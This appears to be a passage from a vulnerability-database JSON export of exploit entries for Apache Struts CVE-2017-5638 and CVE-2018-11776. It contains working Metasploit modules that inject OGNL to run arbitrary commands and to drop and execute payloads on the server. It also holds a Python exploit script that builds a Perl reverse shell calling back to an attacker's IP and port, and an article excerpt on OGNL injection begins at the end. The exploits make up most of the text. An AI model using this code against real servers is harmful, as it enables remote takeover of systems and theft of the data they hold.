)\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\r\n end\r\n\r\n=begin #badchar-checking code\r\n print_status(\"Response code: #{resp.code}\")\r\n #print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body\r\n if resp.headers['Location']\r\n print_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\")\r\n if resp.headers['Location'].split('/')[1] == pre[1..-2]\r\n print_good(\"GOT 'EM!\")\r\n else\r\n print_error(\" #{pre[1..-2]}\")\r\n end\r\n end\r\n=end\r\n\r\n resp\r\n end\r\n\r\n def profile_target\r\n # Use OGNL to extract properties from the Java environment\r\n\r\n properties = { 'os.name': nil, # e.g. 'Linux'\r\n 'os.arch': nil, # e.g. 'amd64'\r\n 'os.version': nil, # e.g. '4.4.0-112-generic'\r\n 'user.name': nil, # e.g. 'root'\r\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\r\n 'user.language': nil, # e.g. 'en'\r\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\r\n }\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|('#{rand_text_alpha(2)}')|\r\n properties.each do |k,v|\r\n ognl << %Q|+(@[email\u00a0protected]('#{k}'))+':'|\r\n end\r\n ognl = ognl[0...-4]\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\r\n elsif r.headers['Location']\r\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\r\n # Extract the OGNL output from the Location path, and strip the two random chars\r\n s = r.headers['Location'].split('/')[1][2..-1]\r\n\r\n if s.nil?\r\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\r\n # But we didn't get any output, so we can't profile the target. Abort.\r\n return nil\r\n end\r\n\r\n # Confirm that all fields were returned, and non include extra (:) delimiters\r\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\r\n if s.count(':') > properties.length\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\r\n end\r\n\r\n # Separate the colon-delimited properties and store in the 'properties' hash\r\n s = s.split(':')\r\n i = 0\r\n properties.each do |k,v|\r\n properties[k] = s[i]\r\n i += 1\r\n end\r\n\r\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\r\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\r\n return properties\r\n else\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\r\n end\r\n end\r\n\r\n def execute_command(cmd_input, opts={})\r\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\r\n if cmd_input.include? ';'\r\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\r\n end\r\n\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n if (os.include? 'linux') || (os.include? 'nix')\r\n cmd = \"{'sh','-c','#{cmd_input}'}\"\r\n elsif os.include? 'win'\r\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\r\n else\r\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\r\n cmd = cmd_input\r\n end\r\n\r\n # The following OGNL will run arbitrary commands on Windows and Linux\r\n # targets, as well as returning STDOUT and STDERR. In my testing,\r\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\r\n\r\n vprint_status(\"Executing: #{cmd}\")\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start()).|\r\n ognl << %q|(#r=(@[email\u00a0protected]().getOutputStream())).|\r\n ognl << %q|(@[email\u00a0protected](#process.getInputStream(),#r)).|\r\n ognl << %q|(#r.flush())|\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r && r.code == 200\r\n print_good(\"Command executed:\\n#{r.body}\")\r\n elsif r\r\n if r.body.length == 0\r\n print_status(\"Payload sent, but no output provided from server.\")\r\n elsif r.body.length > 0\r\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\r\n end\r\n end\r\n end\r\n\r\n def send_payload\r\n # Probe for the target OS and architecture\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n data_header = datastore['HEADER']\r\n if data_header.empty?\r\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\r\n end\r\n\r\n random_filename = datastore['TEMPFILE']\r\n\r\n # d = data stream from HTTP header\r\n # f = path to temp file\r\n # s = stream/handle to temp file\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{random_filename}','tmp')).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\r\n ognl << %q|(#s.write(#d)).|\r\n ognl << %q|(#s.close()).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete()).|\r\n\r\n success_string = rand_text_alpha(4)\r\n ognl << %Q|('#{success_string}')|\r\n\r\n exe = [generate_payload_exe].pack(\"m\").delete(\"\\n\")\r\n r = send_struts_request(ognl, payload: exe)\r\n\r\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\r\n print_good(\"Payload successfully dropped and executed.\")\r\n elsif r && r.headers['Location']\r\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\r\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\r\n elsif r && r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/31056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-28T02:33:40", "description": "Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-08-24T00:00:00", "type": "zdt", "title": "Apache Struts 2.x Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T00:00:00", "id": "1337DAY-ID-30956", "href": "https://0day.today/exploit/description/30956", "sourceData": "[CVEID]:CVE-2018-11776\r\n[PRODUCT]:Apache Struts\r\n[VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16\r\n[PROBLEMTYPE]:Remote Code Execution\r\n[REFERENCES]:https://cwiki.apache.org/confluence/display/WW/S2-057\r\n[DESCRIPTION]:Man Yue Mo from the Semmle Security Research team was\r\nnoticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16\r\nsuffer from possible Remote Code Execution when using results with no\r\nnamespace and in same time, its upper action(s) have no or wildcard\r\nnamespace. Same possibility when using url tag which doesnat have value\r\nand action set and in same time, its upper action(s) have no or wildcard\r\nnamespace.\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30956", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-20T05:11:11", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "zdt", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-15T00:00:00", "id": "1337DAY-ID-27316", "href": "https://0day.today/exploit/description/27316", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vunlerability in Apache Struts\r\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed\r\n via http Content-Type header.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n 'Author' => [\r\n 'Nike.Zheng', # PoC\r\n 'Nixawk', # Metasploit module\r\n 'Chorder', # Metasploit module\r\n 'egypt', # combining the above\r\n 'Jeffrey Martin', # Java fu\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-5638'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Mar 07 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])\r\n ]\r\n )\r\n\r\n @data_header = \"X-#{rand_text_alpha(4)}\"\r\n end\r\n\r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n\r\n ognl = \"\"\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|\r\n\r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if resp && resp.code == 200 && resp.headers[var_a]\r\n vprint_good(\"Victim operating system: #{resp.headers[var_a]}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n #when ARCH_JAVA\r\n # datastore['LHOST'] = nil\r\n # resp = send_payload(payload.encoded_jar)\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload(generate_payload_exe)\r\n end\r\n\r\n require'pp'\r\n pp resp.headers if resp\r\n end\r\n\r\n def send_struts_request(ognl, extra_header: '')\r\n uri = normalize_uri(datastore[\"TARGETURI\"])\r\n content_type = \"%{(#_='multipart/form-data').\"\r\n content_type << \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n content_type << \"(#_memberAccess?\"\r\n content_type << \"(#_memberAccess=#dm):\"\r\n content_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n content_type << \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n content_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n content_type << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n content_type << \"(#context.setMemberAccess(#dm)))).\"\r\n content_type << ognl\r\n content_type << \"}\"\r\n\r\n headers = { 'Content-Type' => content_type }\r\n if extra_header\r\n headers[@data_header] = extra_header\r\n end\r\n\r\n #puts content_type.gsub(\").\", \").\\n\")\r\n #puts\r\n\r\n resp = send_request_cgi(\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\r\n end\r\n resp\r\n end\r\n\r\n def execute_command(cmd)\r\n ognl = ''\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n\r\n # You can add headers to the server's response for debugging with this:\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('decoded',#cmd)).|\r\n\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start())|\r\n\r\n send_struts_request(ognl, extra_header: cmd)\r\n end\r\n\r\n def send_payload(exe)\r\n\r\n ognl = \"\"\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{rand_text_alpha(4)}','.exe')).|\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|\r\n\r\n # Using stuff from the sun.* package here means it likely won't work on\r\n # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to\r\n # work and I don't see a better way of getting binary data onto the\r\n # system. =/\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|\r\n ognl << %q|(#fos.write(#d)).|\r\n ognl << %q|(#fos.close()).|\r\n\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete())|\r\n\r\n send_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\"))\r\n end\r\n\r\nend\r\n\r\n=begin\r\nDoesn't work:\r\n\r\n ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|\r\n ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|\r\n ognl << %q|(#[email\u00a0protected]@getMethods(#c,'main',true).get(0)).|\r\n ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|\r\n ognl << %q|(#m.invoke(null,null)).|\r\n\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n=end\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27316", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-20T03:15:54", "description": "Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell.#### Usage Info\nTested with tomcat8\r Install tomcat8\r Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r Ex:\r Open: $ nc -lnvp 4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'", "cvss3": {}, "published": "2017-03-12T00:00:00", "type": "zdt", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-12T00:00:00", "id": "1337DAY-ID-27300", "href": "https://0day.today/exploit/description/27300", "sourceData": "# CVE-2017-5638\r\n# Apache Struts 2 Vulnerability Remote Code Execution\r\n# Reverse shell from target\r\n# Author: anarc0der - github.com/anarcoder\r\n# Tested with tomcat8\r\n\r\n# Install tomcat8\r\n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r\n\r\n# Ex:\r\n# Open: $ nc -lnvp 4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'\r\n\r\n\r\n\"\"\"\r\nUsage:\r\n struntsrce.py --target=<arg> --test\r\n struntsrce.py --target=<arg> --cmd=<arg>\r\n struntsrce.py --target=<arg> --ip=<arg> --port=<arg>\r\n struntsrce.py --help\r\n struntsrce.py --version\r\nOptions:\r\n -h --help Open help menu\r\n -v --version Show version\r\nRequired options:\r\n --target='url target' your target :)\r\n --test check if target is vulnerable or not\r\n --cmd='uname -a' your command to execute in target\r\n --ip='10.10.10.1' your ip\r\n --port=4444 open port for back connection\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport httplib\r\nimport os\r\nimport sys\r\nfrom docopt import docopt, DocoptExit\r\n\r\n\r\nclass CVE_2017_5638():\r\n\r\n def __init__(self, p_target):\r\n self.target = p_target\r\n # self.ip = p_ip\r\n # self.port = p_port\r\n # self.exploit()\r\n\r\n def generate_revshell(self, p_ip, p_port):\r\n revshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\\r\n \"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\\r\n \"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\\r\n \"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\\r\n \"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\"\r\n return revshell.format(p_ip, p_port)\r\n\r\n def generate_payload(self, p_cmd):\r\n payload = \"%{{(#_='multipart/form-data').\"\\\r\n \"(#[email\u00a0protected][email\u00a0protected]_MEMBER_ACCESS).\"\\\r\n \"(#_memberAccess?\"\\\r\n \"(#_memberAccess=#dm):\"\\\r\n \"((#container=#context['com.opensymphony.xwork2.\"\\\r\n \"ActionContext.container']).\"\\\r\n \"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\\r\n \"[email\u00a0protected])).\"\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\"\\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\"\\\r\n \"(#context.setMemberAccess(#dm)))).\"\\\r\n \"(#cmd='{0}').\"\\\r\n \"(#iswin=(@[email\u00a0protected]('os.name').\"\\\r\n \"toLowerCase().contains('win'))).\"\\\r\n \"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\\r\n \"{{'/bin/bash','-c',#cmd}})).\"\\\r\n \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\\r\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\\r\n \"(#ros=(@[email\u00a0protected]\"\\\r\n \"Response().getOutputStream())).\"\\\r\n \"(@[email\u00a0protected]\"\\\r\n \"(#process.getInputStream(),#ros)).(#ros.flush())}}\"\r\n return payload.format(p_cmd)\r\n\r\n def send_xpl(self, p_payload):\r\n body = ''\r\n try:\r\n # Set proxy for debug request, just uncomment these lines\r\n # Change the proxy port\r\n\r\n #proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'})\r\n #opener = urllib2.build_opener(proxy)\r\n #urllib2.install_opener(opener)\r\n\r\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)'\r\n ' AppleWebKit/537.36 (KHTML, like Gecko)'\r\n ' Chrome/55.0.2883.87 Safari/537.36',\r\n 'Content-Type': p_payload}\r\n xpl = urllib2.Request(self.target, headers=headers)\r\n body = urllib2.urlopen(xpl, timeout=5).read()\r\n except httplib.IncompleteRead as b:\r\n body = b.partial\r\n except:\r\n pass\r\n return body\r\n\r\n def os_detect(self):\r\n cmd = 'uname'\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n if 'Linux' in resp or 'Darwin' in resp:\r\n print '[+] Unix-like OS system detected.\\n'\r\n else:\r\n print '[+] Windows OS system detected.\\n'\r\n\r\n def test_vuln(self):\r\n cmd = 'hacked'\r\n print '\\n[+] Testing ' + self.target\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n tags = ['<html', '<head', '<body', '<script', '<div']\r\n if any(tag not in resp.lower() for tag in tags) and cmd in resp:\r\n print '[+] Target possibly vulnerable'\r\n print '[+] Finger printing OS system..'\r\n self.os_detect()\r\n else:\r\n print '[-] Target not vulnerable\\n'\r\n sys.exit(0)\r\n\r\n def exec_cmd(self, p_cmd):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Executing: {0}\\n\\n'.format(p_cmd)\r\n resp = self.send_xpl(self.generate_payload(p_cmd))\r\n print resp\r\n\r\n def exec_revshell(self, p_ip, p_port):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Dont forget to listen on port: {0}'.format(p_port)\r\n print '[+] Attempting reverse shell...\\n'\r\n\r\n self.send_xpl(self.generate_payload(\r\n self.generate_revshell(p_ip, p_port)))\r\n\r\n\r\ndef main():\r\n try:\r\n arguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\")\r\n target = arguments['--target']\r\n test = arguments['--test']\r\n cmd = arguments['--cmd']\r\n ip = arguments['--ip']\r\n port = arguments['--port']\r\n\r\n except DocoptExit as e:\r\n os.system('python2 struntsrce.py --help')\r\n sys.exit(1)\r\n\r\n x = CVE_2017_5638(target)\r\n if test:\r\n x.test_vuln()\r\n if cmd:\r\n x.exec_cmd(cmd)\r\n if ip and port:\r\n x.exec_revshell(ip, port)\r\n\r\n\r\nif __name__ == '__main__':\r\nmain()\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27300", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how Apache Struts to achieve OGNL injection. Our examples will be set forth in the Struts of the two critical vulnerabilities: CVE-2017-5638\uff08Equifax information disclosure and CVE-2018-11776\u3002 \nApache Struts is a free open source framework for creating modern Java Web applications. Apache Struts has many serious vulnerabilities, one of its characteristics is to support OGNL object graph navigation language, which is also many loopholes is the main reason. \nOne vulnerability, CVE-2017-5638 directly leads to the 2017 Equifax information leakage, exposure to more than 1. 45 million US citizens personal information. Although the company's annual revenue more than 30 billion dollars, but they still did not escape the Apache Struts MVC framework of a known vulnerability attack. \nThis paper mainly introduces the Apache Struts, and then will guide us how to modify a simple application, the use of OGNL and achieve exploits. Next, we will study in depth the platform on a number of Public Exploit way, and try to use OGNL injection vulnerability. \nAlthough Java developers are familiar with Apache Struts, but the security community often does not do however, which is why we wrote this article for the reason. \nGetting started \nRunning a vulnerable Struts application need to install Apache Tomcat [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>a). The package of the latest version can be downloaded here as a ZIP. The binary file decompress to a 